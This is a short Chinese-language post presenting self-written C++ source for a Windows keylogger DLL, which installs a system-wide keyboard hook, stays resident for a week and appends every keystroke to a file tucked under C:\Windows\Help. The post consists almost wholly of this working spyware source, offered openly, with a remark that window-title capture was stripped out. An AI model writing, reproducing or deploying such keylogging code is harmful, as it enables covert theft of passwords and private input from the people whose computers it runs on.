【2022.8.22】自己写的一款很简单的键盘记录器,已去掉获取窗口标题部分逻辑,用的KeyboardProc回调,基本都是提供好的接口
// Crack.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
HINSTANCE hin; //模块句柄:即本模块在内存中的首地址
BOOL APIENTRY DllMain(HMODULE hModule, //入口函数
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
hin = hModule;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
//导出函数:安装钩子
extern "C" __declspec(dllexport) BOOL Install() {
g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, hin, 0);
Sleep(1000 * 60 * 60 * 24 * 7); //一周
if (g_hHook == NULL)
return false;
return true;
}
//导出函数:卸载钩子
extern "C" __declspec(dllexport) BOOL Remove() {
return UnhookWindowsHookEx(g_hHook);
}
//钩子处理函数:键盘回调,参数分别是消息代码,虚拟键代码和扫描代码
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
//打开文件
HANDLE pFile = CreateFile("C:\\Windows\\Help\\Help\\Key\\key.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwHigh;
DWORD dwPos = GetFileSize(pFile, &dwHigh); //移动文件指针,实现字符追加
SetFilePointer(pFile, dwPos, 0, FILE_BEGIN);
if (pFile == INVALID_HANDLE_VALUE) { //文件打开失败
CloseHandle(pFile);
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}
//字符处理
char szText[MAX_PATH];
char szKeyState[256] = { 0 };
char szAscii[4] = { 0 };
DWORD writeBytes;
int enter;
GetKeyboardState((PBYTE ) szKeyState);
char type = GetKeyState(VK_SHIFT); //判断是否按下shift键
szKeyState[VK_SHIFT] = type;
int code = lParam;
code = code >> 16;
int i = ToAscii(wParam, code, (const BYTE *) szKeyState, (LPWORD) szAscii, 0);
szAscii[i] = 0;
if ((lParam & 0x80000000) == 0) { //判断是否按下
enter = GetKeyState(VK_RETURN); //判断是否按下回车键
if (enter < 0) {
wsprintf(szText, "\r\n");
}
else {
wsprintf(szText, "%s", szAscii);
}
WriteFile(pFile, szText, strlen(szText), &writeBytes, NULL);
}
CloseHandle(pFile);
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}